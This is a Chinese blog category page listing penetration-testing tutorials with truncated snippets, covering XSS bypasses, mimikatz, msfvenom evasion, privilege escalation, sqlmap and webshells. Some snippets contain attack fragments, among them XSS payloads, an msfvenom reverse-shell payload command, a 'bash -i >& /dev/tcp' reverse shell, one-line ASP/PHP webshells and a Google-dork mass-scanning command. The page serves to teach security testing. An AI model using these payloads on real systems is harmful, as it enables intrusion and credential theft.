安全
文章平均质量分 72
tomyyyyy
这个作者很懒,什么都没留下…
展开
-
XSS绕过常见方式
XSS绕过常见方式转载自https://www.cnblogs.com/bingtang123/p/12844659.htmlXSS常见方式1.<script>alert(1)</script>2.源码第一个,[<]被转义,因此在第二个里"><script>alert(1)</script><a class="3....原创 2021-08-12 19:58:00 · 404 阅读 · 0 评论 -
mimikazi教程
目录mimikazi教程1、简介1.1、背景介绍1.2、官方链接1.3、mimikatz 与凭证2、基本使用2.1、常用命令2.2、远程连接使用2.3、本地使用2.4、读取域控成员Hash2.4.1、域控本地读取2.4.2、导出域成员Hash2.4.3、secretsdump脚本直接导出域hash2.5、哈希传递2.5.1、工作组环境2.5.2 域环境2.6 票据传递攻击(PTT)2.6.1 黄...原创 2021-08-24 20:20:00 · 2023 阅读 · 0 评论 -
msfvenom——木马免杀篇
msfvenom——木马免杀篇目录msfvenom——木马免杀篇c语言执行生成shellcode.cc语言执行检查python语言执行方法一:python加载C代码方法2:py2exe打包编译exe方法3:base64编码c语言执行生成shellcode.cmsfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_t...原创 2021-08-24 09:40:00 · 2841 阅读 · 1 评论 -
域内用户名枚举和密码喷洒
域内用户名枚举和密码喷洒于Kerberos本身是一种基于身份认证的协议,所以也可对进行暴力破解或用户名枚举,并且不需要域用户下,只要攻击者所控的机器可以与域控的KDC正常通信即可(可以ping通)实验我这里实验主要是域控administrator、域成员af、还有一台非域机。nmap -p 88 --script krb5-enum-users --script-args krb5-en...原创 2021-08-27 08:43:00 · 391 阅读 · 0 评论 -
JD-FreeFuck 后台命令执行漏洞
JD-FreeFuck 后台命令执行漏洞漏洞说明JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器项目地址:https://github.com/meselson/JD-FreeFuck环境搭建脚本一键部署:bash <(curl -sSL https://gitee.com/mjf521/JD-FreeFuck/r...原创 2021-04-14 11:15:00 · 17024 阅读 · 1 评论 -
看图识WAF
看图识WAF转载自潇湘信安记录常见WAF拦截页面1. D盾2.云锁3. UPUPW安全防护4.宝塔网站防火墙5.网防G016. 护卫神7. 网站安全狗8. 智创防火墙9. 360主机卫士或360webscan10.西数WTS-WAF11. Naxsi WAF12. 腾讯云13. 腾讯宙斯盾14. 百度云15. 华为云16....原创 2021-08-28 00:08:00 · 855 阅读 · 0 评论 -
渗透测试工具篇——sqlmap
目录简介基本使用全部参数说明简单使用注入流程sqlmap使用技巧修改最大线程数sqlmap速度优化指定位置注入检测waf执行操作系统命令(--os-shell/--os-cmd)操作文件绕WAF的技巧使用参数绕过使用tamper绕过tamper种类mysql绕过MSSQL绕过access绕过Oracle绕过参考文档简介sqlmap 是一款自动化检测与利用 SQL 注入漏洞的免费开源工具。目前...原创 2021-04-13 16:32:00 · 551 阅读 · 0 评论 -
RDP登录凭据获取
RDP登录凭据获取当用户在RDP登录时点击了保存登录凭据,获取凭据可以使用以下几种方法#查看mstsc的连接记录cmdkey /list#查找本地的Credentialsdir /a %userprofile%\appdata\local\microsoft\credentials\*Mimikatz存在的话,使用Mimikatz,执行以下命令,记录guidMasterKey值...原创 2021-08-27 10:42:00 · 866 阅读 · 0 评论 -
伪造mysql服务端
伪造mysql服务端原理概述MySQL客户端和服务端通信过程中是通过对话的形式来实现的,客户端发送一个操作请求,然后服务端根据客服端发送的请求来响应客户端,在这个过程中客户端如果一个操作需要两步才能完成那么当它发送完第一个请求过后并不会存储这个请求,而是直接就丢掉了,所以第二步就是根据服务端的响应来继续进行,这里服务端就可以欺骗客户端做一些事情。但是一般的通信都是客服端发送一个MySQL语...原创 2021-08-23 16:25:00 · 280 阅读 · 0 评论 -
Weevely——Linux中的菜刀
Weevely(Linux中的菜刀)转载自:https://blog.csdn.net/qq_45521281/article/details/106587791目录Weevely(Linux中的菜刀)基本用法后门生成连接后门weevely模块几个模块的使用::shell_su模块:system_info模块:audit_disablefunctionbypass模块:audit_etc...原创 2021-04-14 20:13:00 · 447 阅读 · 0 评论 -
内网渗透——PSExec工具
内网渗透——PSExec工具目录内网渗透——PSExec工具简介工作原理作为渗透工具的缺点使用流程定位域控无IPC连接有IPC连接Msf中的Psexec模块使用技巧remote UAC参考简介PsExec 是由 Mark Russinovich 创建的 Sysinternals Suite中包含的工具。最初,它旨在作为系统管理员的便利工具,以便他们可以通过在远程主机上运行命令来执行维护任务。...原创 2021-04-16 15:35:00 · 863 阅读 · 0 评论 -
linux提权——suid提权
linux提权——suid提权基础知识suid权限介绍:SUID (Set owner User ID up on execution) 是给予文件的一个特殊类型的文件权限。在 Linux/Unix中,当一个程序运行的时候, 程序将从登录用户处继承权限。SUID被定义为给予一个用户临时的(程序/文件)所有者的权限来运行一个程序/文件。用户在执行程序/文件/命令的时候,将获取文件所有者的权限...原创 2021-04-14 18:05:00 · 356 阅读 · 0 评论 -
linux提权——passwd提权
通过修改/etc/passwd提升权限基础知识/etc/passwd: 文件中的详细信息格式用户名:代表用户账号的字符串。通常长度不超过8个字符,并且由大小写字母和/或数字组成。登录名中不能有冒号(????,因为冒号在这里是分隔符。为了兼容起见,登录名中最好不要包含点字符(.),并且不使用连字符(-)和加号(+)打头。口令:一些系统中,存放着加密后的用户口令字。虽然这个字段存放的只...原创 2021-04-14 17:06:00 · 3272 阅读 · 0 评论 -
sqlmap使用详解
文章目录简介基本使用全部参数说明简单使用注入流程sqlmap使用技巧修改最大线程数sqlmap速度优化指定位置注入检测waf执行操作系统命令(--os-shell/--os-cmd)操作文件绕WAF的技巧使用参数绕过使用tamper绕过tamper种类mysql绕过MSSQL绕过access绕过Oracle绕过参考文档简介sqlmap 是一款自动化检测与利用 SQL 注入漏洞的免费开源工具。目前可以检测用来于检测利用五种不同类型的 SQL 注入布尔型盲注(Boolean-based blind)原创 2021-04-13 16:36:34 · 1009 阅读 · 2 评论 -
Sqmap 利用 Google 批量扫描注入点
Sqmap 利用 Google 批量扫描注入点sqlmap -g "inurl:php?id=10 site:.com.cn" --proxy "http://127.0.0.1:1080" --threads 5 --batch --answer "extending=N,follow=N,keep=N,exploit=n" --smart-g #谷歌搜索–pr...原创 2021-04-13 15:50:00 · 2339 阅读 · 0 评论 -
FRP的使用
目录1、FRP介绍2、FRP的使用2.1 通过SSH访问内网机器2.1.1 服务端2.1.2 客户端2.1.3 使用2.2 通过HTTP协议访问内网WEB服务2.2.1 服务端配置2.2.2 客户端配置2.2.3 使用2.3 通过socks5搭建隧道2.3.1 服务端配置2.3.2 客户端配置2.3.3 使用3、sockets5+ssh 配置3.1 服务端frps.ini3.2 客户端frpc....原创 2021-08-27 23:25:00 · 379 阅读 · 0 评论 -
JWT的安全问题
目录JWT介绍JWT的定义JWT的由来JWT的构成HeaderPayloadSignatureJWT和Token的区别JWT使用方式JWT的安全风险1.敏感信息泄露2.未校验签名3.签名算法可被修改为none(CVE-2015-2951)4.签名密钥可被爆破5.修改非对称密码算法为对称密码算法(CVE-2016-10555)6.伪造密钥(CVE-2018-0114)JWT toolJWT的使用建...原创 2021-08-12 19:51:00 · 3037 阅读 · 1 评论 -
Windows包管理器
Windows包管理器Scoop参考安装命令set-executionpolicy remotesigned -scope currentuser #用powershell执行iex (new-object net.webclient).downloadstring('https://get.scoop.sh') #然后执行使用:Scoop 基础语法从上面的命令中,我们可以发现...原创 2019-11-08 14:00:12 · 528 阅读 · 0 评论 -
nmap的使用
参数auth: 负责处理鉴权证书(绕开鉴权)的脚本broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务brute: 提供暴力破解方式,针对常见的应用如http/snmp等default: 使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力discovery: 对网络进行更多的信息,如SMB枚举、SNMP查询等dos: 用于进行拒...原创 2019-06-21 18:09:00 · 162 阅读 · 0 评论 -
hydra使用
参数详解-R继续从上一次进度接着破解-S大写,采用SSL链接-s 小写,可通过这个参数指定非默认端口-l 指定破解的用户,对特定用户破解-L 指定用户名字典-p 小写,指定密码破解,少用,一般是采用密码字典-P 大写,指定密码字典-e 可选选项,n:空密码试探,s:使用指定用户和密码试探-C 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数-M 指...原创 2019-06-26 21:39:00 · 383 阅读 · 0 评论 -
netcat的使用
1,端口扫描端口扫描经常被系统管理员和黑客用来发现在一些机器上开放的端口,帮助他们识别系统中的漏洞。$nc -z -v -n 172.31.100.7 21-25可以运行在TCP或者UDP模式,默认是TCP,-u参数调整为udp.z 参数告诉netcat使用0 IO,连接成功后立即关闭连接, 不进行数据交换(谢谢@jxing 指点)v 参数指使用冗余选项(译者注:即详细输出)n 参数...原创 2019-06-27 09:59:11 · 188 阅读 · 0 评论 -
渗透过程
第一次拿下服务器信息收集1.IP信息17CE看是否存在cdn存在的话,查找真实ip从国外去访问,查看ip信息去掉www,然后查看ip信息2.旁站信息webscan.cc站长之家3.C段信息webscan.cc站长之家4.子域名信息layer子域名挖掘机subdomain5.端口信息nmapportscan6.网站目录信息...原创 2019-07-12 21:35:28 · 209 阅读 · 0 评论 -
注入(一)
eg:例子第一步,判断是否存在sql注入漏洞构造 ?id=1 and 1=1 ,回车页面返回正常构造 ?id=1 and 1=2 ,回车页面不正常,初步判断这里 可能 存在一个注入漏洞第二步:判断字段数构造 ?id=1 and 1=1 order by 1 回车页面正常构造 ?id=1 and 1=1 order by 2 回车页面正常构造 ?id=1 and 1=1 o...原创 2019-06-28 19:55:32 · 276 阅读 · 0 评论 -
获得shell的几种姿势
windows提权1.通过sqlmap连接mysql获取shell(1)直接连接数据库sqlmap.py -d “mysql://root:123456@127.0.0.1:3306/mysql”–os-shell(2)通过选择32位或者64位操作系统,获取webshell,执行bash -i >& /dev/tcp/192.168.1.3/80800>&1...原创 2019-07-13 20:34:02 · 1007 阅读 · 0 评论 -
cmd命令
运行参考可以通过cmd /c 命令 和 cmd /k 命令的方式来直接运行命令注:/c表示执行完命令后关闭cmd窗口;/k表示执行完命令后保留cmd窗口services.msc—本地服务设置cleanmgr——-垃圾整理net start [服务名] 启动一个服务 net stop [服务名] 停用一个服务slmgr.vbs -dlv 查看激活信息slmgr.vbs -dli列出...原创 2019-06-29 20:29:06 · 230 阅读 · 0 评论 -
windows服务参考
dll文件aaclient.dll 何时何地都可以访问客户端accessibilitycpl.dll 轻松访问控制面板acledit.dll 访问控制列表编辑器aclui.dll 安全描述符编辑器acppage.dll 兼容性选项卡外壳扩展库ActionCenter.dll 操作中心ActionCenterCPL.dll 操作中心控制面板activeds.dll AD 路由器DLL...原创 2019-06-29 20:30:37 · 951 阅读 · 0 评论 -
一句话木马
一句话木马asp<%execute(request("kxc"))%><%eval request ("pass")%><%eval request(chr(35))%><%executerequest("YouPass")%><%eval(request(“1″)):response.end%>php<...原创 2019-07-21 16:16:45 · 514 阅读 · 0 评论 -
注入总结
注入总结参考链接MYSQL有时使用union注入时,会出现一些乱码,如下解决convert(@@version using latin1)unhex(hex(@@version))注释符井号(#) 双横线 (-- )后面要加一个空格 /**/ 局部注释 %00 直接截断字符串 `反引号关键字转义符波浪线那个键,的那个小点符号- -!insert into a...原创 2019-07-21 16:19:30 · 284 阅读 · 0 评论 -
文件上传
我们在做渗透测试的时候会经常遇到存在命令执行的Windows服务器,而且不能上传shell,唯一的入口就是命令执行,这种情况下,我们需要向服务器上传一个大一点的工具,如何实现,这就是本文章主要的内容。利用http协议下载文件利用vbs下载将下面的代码保存为test.vbs执行如下语句:cscript test.vbs利用powershell下载将如下代码保存为test.ps1$...原创 2019-07-21 16:20:30 · 230 阅读 · 0 评论 -
sqlmap的使用
查找注入点 参数-u URL, --url=URL 目标为 URL (例如. “http://www.site.com/vuln.php?id=1”)-g GOOGLEDORK 将谷歌dork的结果作为目标url请求:这些选项可用于指定如何连接到目标URL–data=DATA 数据字符串通过POST发送–cookie=COOKIE HT...原创 2019-06-21 17:59:07 · 427 阅读 · 0 评论